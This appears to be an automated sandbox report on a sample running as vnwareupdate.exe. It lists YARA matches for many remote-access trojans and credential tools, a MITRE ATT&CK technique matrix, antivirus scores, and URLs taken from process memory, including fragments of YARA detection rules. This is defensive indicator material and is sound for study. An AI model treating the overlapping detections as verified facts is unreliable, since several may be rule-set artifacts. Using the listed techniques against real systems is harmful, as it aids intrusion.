Code function: 3_2_00401DC8 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

3_2_00401DC8

Source: C:\Users\user\Desktop\GZe6EcSTpO.exe

0_2_0040320C

Source: C:\Users\user\Desktop\vnwareupdate.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected Codoso Ghost

Show sources

Source: Yara match

File source: Process Memory Space: vnwareupdate.exe PID: 2540, type: MEMORY

Yara detected GhostRat

Show sources

Source: Yara match

File source: Process Memory Space: vnwareupdate.exe PID: 2540, type: MEMORY

Yara detected Mimikatz

Show sources

Source: Yara match	File source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vnwareupdate.exe PID: 2540, type: MEMORY

Yara detected Mini RAT

Show sources

Source: Yara match	File source: 0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp, type: MEMORY

Yara detected Nukesped

Show sources

Source: Yara match	File source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vnwareupdate.exe PID: 2540, type: MEMORY

Yara detected PupyRAT

Show sources

Source: Yara match	File source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vnwareupdate.exe PID: 2540, type: MEMORY

Yara detected Quasar RAT

Show sources

Source: Yara match	File source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vnwareupdate.exe PID: 2540, type: MEMORY

Yara detected RevengeRAT

Show sources

Source: Yara match	File source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vnwareupdate.exe PID: 2540, type: MEMORY

Yara detected WebMonitor RAT

Show sources

Source: Yara match	File source: 0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vnwareupdate.exe PID: 2540, type: MEMORY

Remote Access Functionality:

Detected HawkEye Rat

Show sources

Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: \HawkEye_Keylogger_
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: rule MAL_HawkEye_Keylogger_Gen_Dec18_RID324D : DEMO GEN HKTL MAL T1056 T1113 {
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: rule HawkEye_Keylogger_Feb18_1_RID302C : DEMO EXE FILE MAL T1056 {

Detected Nanocore Rat

Show sources

Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: $x2 = "NanoCore.ClientPluginHost" fullword ascii
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: $x1 = "NanoCore.ClientPluginHost" fullword ascii

Detected xRAT

Show sources

Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp

String found in binary or memory: $x5 = "<description>My UAC Compatible application</description>" fullword ascii

Yara detected CobaltStrike

Show sources

Source: Yara match	File source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vnwareupdate.exe PID: 2540, type: MEMORY

Yara detected Codoso Ghost

Show sources

Source: Yara match

File source: Process Memory Space: vnwareupdate.exe PID: 2540, type: MEMORY

Yara detected GhostRat

Show sources

Source: Yara match

File source: Process Memory Space: vnwareupdate.exe PID: 2540, type: MEMORY

Yara detected Mini RAT

Show sources

Source: Yara match	File source: 0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp, type: MEMORY

Yara detected Nukesped

Show sources

Source: Yara match	File source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vnwareupdate.exe PID: 2540, type: MEMORY

Yara detected PupyRAT

Show sources

Source: Yara match	File source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vnwareupdate.exe PID: 2540, type: MEMORY

Yara detected Quasar RAT

Show sources

Source: Yara match	File source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vnwareupdate.exe PID: 2540, type: MEMORY

Yara detected RevengeRAT

Show sources

Source: Yara match	File source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vnwareupdate.exe PID: 2540, type: MEMORY

Yara detected Turla ComRAT XORKey

Show sources

Source: Yara match	File source: 0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vnwareupdate.exe PID: 2540, type: MEMORY

Yara detected WebMonitor RAT

Show sources

Source: Yara match	File source: 0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vnwareupdate.exe PID: 2540, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Command and Scripting Interpreter1	Path Interception	Access Token Manipulation1	Masquerading1	OS Credential Dumping1	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel2	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Data Encrypted for Impact2
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Process Injection12	Virtualization/Sandbox Evasion1	LSASS Memory	Query Registry1	Remote Desktop Protocol	Clipboard Data1	Exfiltration Over Bluetooth	Remote Access Software3	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	System Shutdown/Reboot1
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Access Token Manipulation1	Security Account Manager	Security Software Discovery121	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Proxy1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection12	NTDS	Virtualization/Sandbox Evasion1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Deobfuscate/Decode Files or Information1	LSA Secrets	Process Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Obfuscated Files or Information3	Cached Domain Credentials	File and Directory Discovery3	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Software Packing1	DCSync	System Information Discovery16	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	File Deletion1	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
GZe6EcSTpO.exe	53%	Virustotal		Browse
GZe6EcSTpO.exe	42%	ReversingLabs	ByteCode-MSIL.Spyware.Heye
GZe6EcSTpO.exe	100%	Avira	BDS/Fynloski.hmjvc

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.certego.net/en/news/nearly-undetectable-qarallax-rat-spreading-via-spfdNearly	0%	Avira URL Cloud	safe
https://mymalwareparty.blogspot.co.uk/2017/07/operation-desert-eagle.htmls/Operation	0%	Avira URL Cloud	safe
https://cysinfo.com/malware-actors-using-nic-cyber-security-themed-spear-phishinn	0%	Avira URL Cloud	safe
https://cert.gov.il/Updates/Alerts/SiteAssets/CERT-IL-ALERT-W-120.pdfLegspin	0%	Avira URL Cloud	safe
https://www.blueliv.com	0%	Avira URL Cloud	safe
http://www.aftana.ir/images/docs/files/000002/nf00002716-1.pdfHancitor	0%	Avira URL Cloud	safe
http://www.cyphort.com/multiple-malwares-used-to-target-an-asian-financial-insti:/Multiple	0%	Avira URL Cloud	safe
http://www.clearskysec.com/winnti/Recent	0%	Avira URL Cloud	safe
http://www.crysys.hu/miniduke/miniduke_indicators_public.pdfMiniduke	0%	Avira URL Cloud	safe
http://www.clearskysec.com/dustysky/	0%	Avira URL Cloud	safe
http://x.x.x/x.dll	0%	Avira URL Cloud	safe
http://pwc.blogs.com/files/cto-tib-20150223-01a.pdfSakula	0%	Avira URL Cloud	safe
http://www.intezer.com/another-distraction-new-version-north-korean-ransomware-h24A	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://goo.gl/joxXHF	vnwareupdate.exe, 00000003.00000002.545077306.0000000003787000.00000004.00000001.sdmp	false		high
https://www.alienvault.com/open-threat-ex/Operation	vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp	false		high
http://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2013/Unveiling%20araHangover	vnwareupdate.exe, 00000003.00000002.543787913.0000000003707000.00000004.00000001.sdmp	false		high
https://www.arbornetworks.com/blog/asert/dirtjumpers-ddos-engine-gets-a-tune-up-kCommunities	vnwareupdate.exe, 00000003.00000002.544656700.0000000003747000.00000004.00000001.sdmp	false		high
http://www.certego.net/en/news/nearly-undetectable-qarallax-rat-spreading-via-spfdNearly	vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdfpoOperation	vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp	false		high
http://www.symantec.com/content/en/us/enterprise/media/security_response/docs/ScBanking	vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	false		high
https://www.fireeye.com/blog/threat-research/2017/05/eps-processing-zero-days.htThe	vnwareupdate.exe, 00000003.00000002.570079073.0000000004121000.00000004.00000001.sdmp	false		high
http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papeNwOperation	vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	false		high
https://asert.arbornetworks.com/uncovering-the-seven-pointed-dagger/	vnwareupdate.exe, 00000003.00000003.232758250.0000000005F33000.00000004.00000001.sdmp	false		high
https://www.welivesecurity.com/wp-content/uploads/2017/07/Stantinko.pdfStantinko	vnwareupdate.exe, 00000003.00000002.570785608.0000000004161000.00000004.00000001.sdmp	false		high
http://news.asiaone.com/news	vnwareupdate.exe, 00000003.00000003.234026973.0000000005B73000.00000004.00000001.sdmp	false		high
http://phishme.com/disrupting-an-adware-serving-skype-botnet/	vnwareupdate.exe, 00000003.00000003.234338719.0000000006073000.00000004.00000001.sdmp	false		high
https://www.proofpoint.com/us/threat-insight/post/Meet-GreenDispenser	vnwareupdate.exe, 00000003.00000003.232809431.0000000005F73000.00000004.00000001.sdmp	false		high
http://www.secureworks.com/cyber-threat-intelligence/threats/sakula-malware-famiComment	vnwareupdate.exe, 00000003.00000002.557653688.0000000003E61000.00000004.00000001.sdmp	false		high
http://www.welivesecurity.com/2015/04/09/operation-buhtrap/ROKRAT	vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	false		high
https://labs.bitdefender.com/wp-content/uploads/downloads/operation-pzchao-insidsOperation	vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	false		high
https://mymalwareparty.blogspot.co.uk/2017/07/operation-desert-eagle.htmls/Operation	vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://goo.gl/SGcS2HSymantec	vnwareupdate.exe, 00000003.00000002.543787913.0000000003707000.00000004.00000001.sdmp	false		high
http://cyber.verint.com/nymaim-malware-variant/aAPT28	vnwareupdate.exe, 00000003.00000002.544656700.0000000003747000.00000004.00000001.sdmp	false		high
https://goo.gl/rW1yvZ	vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	false		high
https://cysinfo.com/malware-actors-using-nic-cyber-security-themed-spear-phishinn	vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.bluecoat.com/security-blog/2015-08-21/tinted-cve-decoy-spearphising-Spearphising	vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	false		high
http://blog.checkpoint.com/wp-content/uploads/2015/10/sb-report-threat-intellige8	vnwareupdate.exe, 00000003.00000002.570785608.0000000004161000.00000004.00000001.sdmp	false		high
http://blog.cylance.com/spear-a-threat-actor-resurfacesThe	vnwareupdate.exe, 00000003.00000002.568465087.00000000040A1000.00000004.00000001.sdmp	false		high
https://blog.trendmicro.com/trendlabs-security-intelligence/deciphering-confuciuClDeciphering	vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	false		high
https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-tieseNew	vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	false		high
https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malw-Gold	vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	false		high
https://cert.gov.il/Updates/Alerts/SiteAssets/CERT-IL-ALERT-W-120.pdfLegspin	vnwareupdate.exe, 00000003.00000002.569366992.00000000040E1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://research.checkpoint.com/apt-attack-middle-east-big-bang/	vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	false		high
https://blogs.forcepoint.com/security-labs/zeus-delivered-deloader-defraud-custoChinese	vnwareupdate.exe, 00000003.00000002.565870570.0000000003FE1000.00000004.00000001.sdmp	false		high
https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-pe	vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	false		high
http://phishme.com/bolek-leaked-carberp-kbot-source-code-complicit-new-phishing-Bolek:	vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	false		high
https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pd	vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	false		high
https://public.gdatasoftware.com/Presse/Publikationen/Whitepaper/EN/GDATA_TooHas.Operation	vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	false		high
https://goo.gl/7jGkpV	vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	false		high
http://blog.talosintelligence.com/2017/09/brazilbanking.htmlGlobe	vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	false		high
http://www.welivesecurity.com/2016/07/12/nymaim-rides-2016-reaches-brazil/Regin	vnwareupdate.exe, 00000003.00000002.569366992.00000000040E1000.00000004.00000001.sdmp	false		high
https://www.blueliv.com	vnwareupdate.exe, 00000003.00000003.234338719.0000000006073000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.aftana.ir/images/docs/files/000002/nf00002716-1.pdfHancitor	vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://securelist.com/analysis/publications/69953/the-naikon-apt/Citadel	vnwareupdate.exe, 00000003.00000002.567684552.0000000004061000.00000004.00000001.sdmp	false		high
http://phishme.com/disrupting-an-adware-serving-skype-botnet/Pushdo	vnwareupdate.exe, 00000003.00000002.557653688.0000000003E61000.00000004.00000001.sdmp	false		high
http://2016.eicar.org/85-0-Download.html	vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	false		high
https://vms.drweb.com/virus/?_is=1&ampLinux.Proxy.10	vnwareupdate.exe, 00000003.00000002.543787913.0000000003707000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.237309639.0000000003707000.00000004.00000001.sdmp	false		high
https://circl.lu/assets/files/tr-12/tr-12-circl-plugx-analysis-v1.pdfampAnalysis	vnwareupdate.exe, 00000003.00000002.546099143.00000000037C7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	false		high
http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papeioOperation	vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	false		high
http://blogs.cisco.com/security/talos/malicious-pngs6b44c772bac7cc958b1b4535f02a584fc3a55377a3e7f4cc	vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	false		high
https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/	vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	false		high
http://blog.trendmicro.com/trendlabs-security-intelligence/trend-micro-discoversKorplug	vnwareupdate.exe, 00000003.00000002.567684552.0000000004061000.00000004.00000001.sdmp	false		high
https://www.alienvault.com/blogs/labs-researcwrWannaCry	vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	false		high
http://www.bleepingcomputer.com/news/security/cryptoluck-ransomware-being-malverNew	vnwareupdate.exe, 00000003.00000002.544656700.0000000003747000.00000004.00000001.sdmp	false		high
http://www.cyphort.com/multiple-malwares-used-to-target-an-asian-financial-insti:/Multiple	vnwareupdate.exe, 00000003.00000002.557653688.0000000003E61000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/ptrrkssn/pnscan	vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	false		high
http://community.hpe.com/t5/Security-Research/9002-RAT-a-second-building-on-the-	vnwareupdate.exe, 00000003.00000003.241595025.0000000005951000.00000004.00000001.sdmp	false		high
https://blog.trendmicro.com/trendlabs-security-intelligence/vulnerabilities-apac9Vulnerabilities	vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	false		high
http://www.clearskysec.com/winnti/Recent	vnwareupdate.exe, 00000003.00000002.568465087.00000000040A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-speaLeviathan:	vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	false		high
http://www.crysys.hu/miniduke/miniduke_indicators_public.pdfMiniduke	vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.proofpoint.com/us/threat-insight/post/threat-actors-using-legitimate	vnwareupdate.exe, 00000003.00000003.233888921.0000000005C33000.00000004.00000001.sdmp	false		high
http://www.waseda.jp/navi/security/2017/0414.htmlCallisto	vnwareupdate.exe, 00000003.00000002.569366992.00000000040E1000.00000004.00000001.sdmp	false		high
https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.htmlAPT32	vnwareupdate.exe, 00000003.00000002.567684552.0000000004061000.00000004.00000001.sdmp	false		high
http://www.clearskysec.com/dustysky/	vnwareupdate.exe, 00000003.00000003.242880867.0000000003BE7000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://blog.trendmicro.com/trendlabs-security-intelligence/lurk-retracing-five-y8	vnwareupdate.exe, 00000003.00000002.567684552.0000000004061000.00000004.00000001.sdmp	false		high
http://www.malware-traffic-analysis.net/2017/03/30/index2.htmlxCaon	vnwareupdate.exe, 00000003.00000002.543787913.0000000003707000.00000004.00000001.sdmp	false		high
https://researchcenter.paloaltonetworks.com/2018/01/unit42-powerstager-analysis/4PowerStager	vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	false		high
http://blog.netlab.360.com/ddg-a-mining-botnet-aiming-at-database-server-en/dDDG:	vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	false		high
http://researchcenter.paloaltonetworks.com/2016/05/unit42-krbanker-targets	vnwareupdate.exe, 00000003.00000003.233614213.0000000005D73000.00000004.00000001.sdmp	false		high
https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PD1Truebot.A	vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	false		high
http://go.cybereason.com/rs/996-	vnwareupdate.exe, 00000003.00000003.233668995.0000000005DB3000.00000004.00000001.sdmp	false		high
https://www.symantec.com/security_response/writeup.jsp?docid=2018-021208-2435-99Ransom.ShurL0ckr	vnwareupdate.exe, 00000003.00000003.234528386.0000000006133000.00000004.00000001.sdmp	false		high
https://blogs.rsa.com/wp-content/Operation	vnwareupdate.exe, 00000003.00000002.568465087.00000000040A1000.00000004.00000001.sdmp	false		high
http://researchcenter.paloaltonetworks.com/2016/01/nettraveler-spear-phishing-emNetTraveler	vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	false		high
https://www.welivesecurity.com/2017/12/08/strongpity-like-spyware-replaces-finfi	vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	false		high
http://researchcenter.paloaltonetworks.com/2015/10/yispecter-first-ios-malware-aOperation	vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	false		high
http://blog.checkpoint.com/2017/05/10/diamondfox-modular-malware-one-stop-shop/Spear	vnwareupdate.exe, 00000003.00000002.569366992.00000000040E1000.00000004.00000001.sdmp	false		high
http://x.x.x/x.dll	vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://pwc.blogs.com/files/cto-tib-20150223-01a.pdfSakula	vnwareupdate.exe, 00000003.00000002.527918576.0000000002831000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.bluecoat.com/security-blog/2015-04-09/visual-basic-script-malware-rePotential	vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	false		high
https://www.arbornetworks.com/blog/asert/flokibot-invades-pos-trouble-brazil/	vnwareupdate.exe, 00000003.00000003.234026973.0000000005B73000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.568465087.00000000040A1000.00000004.00000001.sdmp	false		high
https://twitter.com/eyaBanking	vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	false		high
https://bitbucket.org/cybertools/whitepapers/downloads/Pitty%20Tiger%20Final%20RRSA	vnwareupdate.exe, 00000003.00000002.543787913.0000000003707000.00000004.00000001.sdmp	false		high
https://blogs.rsa.com/terracotta-vpn-enabler-of-advanced-threat-anonymity/	vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	false		high
https://twitter.com/cyb3rops/status/1097423665472376832ASCS	vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	false		high
http://www.intezer.com/another-distraction-new-version-north-korean-ransomware-h24A	vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://objective-see.com/blog/blog_0x26.html	vnwareupdate.exe, 00000003.00000003.237611046.00000000038E7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.245916145.0000000003967000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.237713875.0000000003967000.00000004.00000001.sdmp	false		high
http://blog.talosintelligence.com/2017/02/korean-maldoc.htmlCloud	vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	false		high
http://researchcenter.paloaltonetworks.com/2015/07/apt-group-ups-targets-us-gove	vnwareupdate.exe, 00000003.00000003.242436168.0000000003BA7000.00000004.00000001.sdmp	false		high
http://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blackD1Following	vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	false		high
https://www.welivesecurity.com/wp-content/uploads/2017/07/Stantinko.pdf.	vnwareupdate.exe, 00000003.00000002.570785608.0000000004161000.00000004.00000001.sdmp	false		high
https://www.riskiq.com/blog/labs/fake-flash-update-watering-hole-attack/	vnwareupdate.exe, 00000003.00000003.245318104.0000000003B27000.00000004.00000001.sdmp	false		high
https://twitter.com/0x766c6164/status/794176576011309056	vnwareupdate.exe, 00000003.00000003.241595025.0000000005951000.00000004.00000001.sdmp	false		high
https://goo.gl/t3uUTG	vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	false		high
https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDeBankshot	vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	false		high
https://securelist.com/analysis/publications/69953/the-naikon-apt/	vnwareupdate.exe, 00000003.00000003.241827224.0000000005711000.00000004.00000001.sdmp	false		high
https://researchcenter.paloaltonetworks.com/2017/10/unit42-oilrig-group-steps-atOilRig	vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	false		high
https://www.openssl.org/docs/faq.html	vnwareupdate.exe	false		high
https://blogs.forcepoint.com/security-labs/ursnif-variant-found-using-mouse-move8	vnwareupdate.exe, 00000003.00000002.565870570.0000000003FE1000.00000004.00000001.sdmp	false		high
